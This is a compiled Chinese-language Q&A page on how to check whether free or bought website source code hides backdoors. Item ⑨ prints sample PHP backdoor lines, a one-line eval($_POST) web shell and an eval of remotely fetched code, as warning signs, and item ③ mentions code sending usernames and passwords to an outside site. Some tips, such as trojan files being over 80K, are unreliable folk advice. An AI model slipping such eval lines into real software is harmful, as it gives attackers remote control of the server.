① 如何知道免費的網站源碼被弄了後門
這個難說 我現在也在該源碼 發現免費的源碼 字元過濾不足,後台注入漏洞很多 很多功能都有問題 改一改就可以了 很難保證安全性的
我是全部源碼看一邊 改過 才剛用的
你用 冰舞或NBSI2API 軟體 掃描下 一般都可以掃出來
② 網站後台源碼有後門,怎麼修改。
如果你沒有扎實的編程基礎…… 你還是換一個吧……
③ php源碼後門。
危險
把$uin和$pwd傳送到這個網站
如果你不信任這個網站,這是很危險的.
這個網站可以獲得這兩個值
④ 新下載一個網站源碼,如何查看有無後門程序或代碼
呵呵,不用查,下載的源碼,肯定有後門,至於後門你是查不到的.但木馬你可以查到;一般木馬文件在80K以上,你可以全站打開文件一個一個找,發現可疑,用記事本打開,如果裡面是加密的,就是木馬文件了.
程序真正的漏洞,是因為程序員沒經驗,無意間留下的,那種是無法查出的,只有有經驗的程序員才可以看出來.
最後建議,用免費源碼,可用dedecms或帝國這種開源的,這種程序較完整,從官網上下,也沒有後門什麼的;其它的免費源碼你學慣用還是可以的,但不要商用,否則被人家掛馬黑掉是跑不掉的,肯定的事.
如果嫌dedecms復雜,就花點錢,買個原創正版的源碼.
以上由200源碼技要員妞妞為您解答,希望對您有所幫助
⑤ 如何查看一個PHP源碼是否有後門
1、很難,因為有的後門會加處理的,很難掃描出來的,要一句一句去排除;
2、可以把修改日期跟大部分日期不一樣的文件過一遍。
⑥ 如何檢查網站源碼是否有後門
一,把網站源碼放到空間里把網站建起來
二,網路搜360網站安全檢測,找到360用來檢測網站的站
三,認證網站,提交網址
四,幾分鍾後就會幫你檢測出網站的木馬或漏洞了
五,當然了,免費源碼漏洞肯有的,有些可能檢不出來,他是屬於程序員的經驗不足造成的,還有的是黑客故意留的,明顯的會檢查出來,免費源碼常理是不能用的,一是因為有版權問題,用了以後會有麻煩,另外還有安全隱患.別忘了放了這些源碼的都是些什麼人,他們讓你用這些源碼的目的.如果你是想正規做站,個人建議你還是去淘寶,200源碼網,拍拍,A5論壇花幾百元買些正品來用,注意是花幾百元,不是幾元幾十元,因為那些幾十元的大多也是免費的.
⑦ 買別人做的網站源碼,怎麼知道有沒有後門,如果是自己的伺服器,即使有後門也沒關系嗎
肯定有關系,你最好從正規渠道購買,有合同發票,避免損失。
第三方購買的話,最好找人審計一下。
⑧ 網上下載的網站源碼怎麼才能找出是否有後門
這個源碼好像是找不出後門的吧
⑨ php源碼開源有沒有可能做後門
代碼後門大多是一句話,
比如:
eval($_POST['backdoor']);
//樓主大多注意獲取數據的來源是否可靠
//注意接受表單數據函數如:$_POST[];$_GET[];
//和注意文件的讀寫,最可怕的是這個:
eval(file_get_contents('http://www/shell.html'));//等等
//這個叫做遠程執行,如果發現異常,請立馬開啟PHP的安全模式,再慢慢排查!